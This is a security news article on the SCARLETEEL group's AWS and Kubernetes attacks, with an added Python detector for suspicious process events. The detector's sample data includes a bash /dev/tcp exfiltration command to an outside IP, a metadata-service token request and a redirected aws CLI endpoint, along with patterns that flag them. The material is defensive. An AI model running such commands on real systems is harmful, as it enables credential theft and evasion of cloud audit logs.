SCARLETEEL Fine-Tunes AWS and Kubernetes Attack Tactics
With SCARLETEEL, attackers can exploit a vulnerable Kubernetes container and pivot to going after the underlying cloud service account.
Back in February, the Sysdig Threat Research Team discovered a sophisticated cloud attack in the wild, SCARLETEEL. It exploited containerized workloads and leveraged them into AWS privilege-escalation attacks. That was bad. It’s gotten worse. Now, Sysdig has found it targeting more advanced platforms, such as AWS Fargate.
Reiterating previous strategies, the group’s recent activities involved compromising AWS accounts by exploiting weak compute services, establishing persistence, and deploying cryptominers to secure financial gain. If unchecked, the group was projected to mine approximately $4,000 per day.
But, wait, there’s more! SCARLETEEL is also in the business of intellectual property theft.
During the recent attack, the group discovered and exploited a loophole in an AWS policy, allowing them to escalate privileges to AdministratorAccess, thereby gaining total control over the targeted account. They have also expanded their focus to Kubernetes, intending to scale up their attacks.
The recent attack brought some new features to the fore. These included:
- Scripts capable of detecting Fargate-hosted containers and collecting credentials.
- Escalation to Admin status in the victim’s AWS account to start EC2 instances running miners.
- Improved tools and techniques to enhance their attack capabilities and evasion techniques.
- Exploitation attempts of IMDSv2 to retrieve tokens and AWS credentials.
- Multiple changes in C2 domains, leveraging public services for data transmission.
- Use of AWS CLI and pacu on exploited containers to increase AWS exploitation.
- Use of the Kubernetes penetration-testing tool peirates to exploit Kubernetes further.
SCARLETEEL has also shown a particular fondness for AWS credential theft by exploiting JupyterLab notebook containers deployed in a Kubernetes cluster. This approach involved leveraging several versions of credential-stealing scripts, employing varying techniques and exfiltration endpoints. These scripts hunt for AWS credentials in the instance metadata service (both IMDSv1 and IMDSv2), in the filesystem, and within Docker containers on the target machine, regardless of whether those containers are running.
Interestingly, the exfiltration function employed uses shell built-ins to transmit the Base64 encoded stolen credentials to the C2 IP Address, a stealthier approach that evades tools that typically monitor curl and wget.
By manipulating the “--endpoint-url” option, the group also redirects API requests away from the default AWS service endpoints, preventing these requests from appearing in the victim’s CloudTrail. Given the opportunity, it will also download and run Mirai Botnet Pandora, a Distributed Denial of Service (DDoS) malware program.
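The three behaviours above (metadata-service lookups from inside a workload, AWS CLI calls sent to a non-AWS endpoint so they never reach the victim’s CloudTrail, and exfiltration via shell built-ins rather than curl or wget) can be flagged from process-execution events. The detector below is an added illustration, not Sysdig’s code or the report’s rules; the event format and sample command lines are constructed, and it assumes the “shell built-in” in question is bash’s /dev/tcp redirection, which the article does not name.

```python
import re
import shlex
from urllib.parse import urlparse

# Constructed process-execution events in a hypothetical {"pid", "cmdline"} shape.
SAMPLE_EVENTS = [
    {"pid": 101, "cmdline": "aws sts get-caller-identity"},
    {"pid": 102, "cmdline": "aws s3 ls --endpoint-url https://example-relay.invalid"},
    {"pid": 103, "cmdline": "curl -s -X PUT http://169.254.169.254/latest/api/token "
                            "-H X-aws-ec2-metadata-token-ttl-seconds:21600"},
    {"pid": 104, "cmdline": "bash -c 'echo $DATA > /dev/tcp/203.0.113.10/443'"},
    {"pid": 105, "cmdline": "aws s3 ls --endpoint-url https://s3.us-east-1.amazonaws.com"},
]

IMDS_RE = re.compile(r"169\.254\.169\.254")          # EC2/ECS instance metadata address
DEVTCP_RE = re.compile(r"/dev/(tcp|udp)/")            # bash built-in network redirection (assumed)

def non_aws_endpoint(cmdline):
    """Return the --endpoint-url host when an aws CLI call targets a non-AWS host, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or argv[0] != "aws":
        return None
    for i, arg in enumerate(argv):
        url = None
        if arg == "--endpoint-url" and i + 1 < len(argv):
            url = argv[i + 1]
        elif arg.startswith("--endpoint-url="):
            url = arg.split("=", 1)[1]
        if url:
            host = urlparse(url).hostname or ""
            if not (host == "amazonaws.com" or host.endswith(".amazonaws.com")):
                return host
    return None

def classify(event):
    """Return a list of findings for one event; empty list means nothing suspicious."""
    cmd = event["cmdline"]
    findings = []
    host = non_aws_endpoint(cmd)
    if host:
        findings.append(f"aws CLI endpoint redirected to {host} (requests bypass victim CloudTrail)")
    if IMDS_RE.search(cmd):
        findings.append("instance metadata service contacted from workload")
    if DEVTCP_RE.search(cmd):
        findings.append("shell built-in network redirection (curl/wget-less exfiltration)")
    return findings

def scan(events):
    """Map pid -> findings for every event that triggered at least one rule."""
    return {e["pid"]: f for e in events if (f := classify(e))}
```

In a real deployment these rules would run on runtime exec events from the container host and be tuned to the workload: a legitimate SDK inside an EC2 or Fargate task does talk to the metadata service, so the IMDS rule is most useful when restricted to processes that should never need credentials, such as a notebook kernel.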
After collecting the AWS keys, SCARLETEEL automated reconnaissance in the victim’s AWS environment. A misstep in the victim’s user naming convention allowed the attackers to bypass a policy that would have otherwise prevented access key creation for admin users.
Once admin access was secured, SCARLETEEL focused on persistence, creating new users and access keys for all users in the account. With admin access, the group then deployed 42 instances of c5.metal/r5a.4xlarge for cryptomining.
Although the noisy launch of excessive instances led to the attacker’s discovery, the assault did not stop there. The attacker turned to other new or compromised accounts, attempting to steal secrets or update SSH keys to create new instances. In the event, the lack of privileges thwarted further progression.
Still, this is a disturbing attack. “The combination of automation and manual review of the collected data makes this attacker a more dangerous threat,” pointed out the report’s author, Alessandro Brucato, Sysdig Threat Research Engineer. “It isn’t just nuisance malware, like a crypto miner is often thought of, as they are looking at as much of the target environment as they can.”
The SCARLETEEL operation’s continued activity underscores the need for multiple defensive layers, including runtime threat detection and response, vulnerability management, cloud security posture management (CSPM), and cloud infrastructure entitlement management (CIEM). The absence of these layers could expose organizations to significant financial risks and data theft. To deal with attackers like SCARLETEEL, it’s all hands and tools on deck.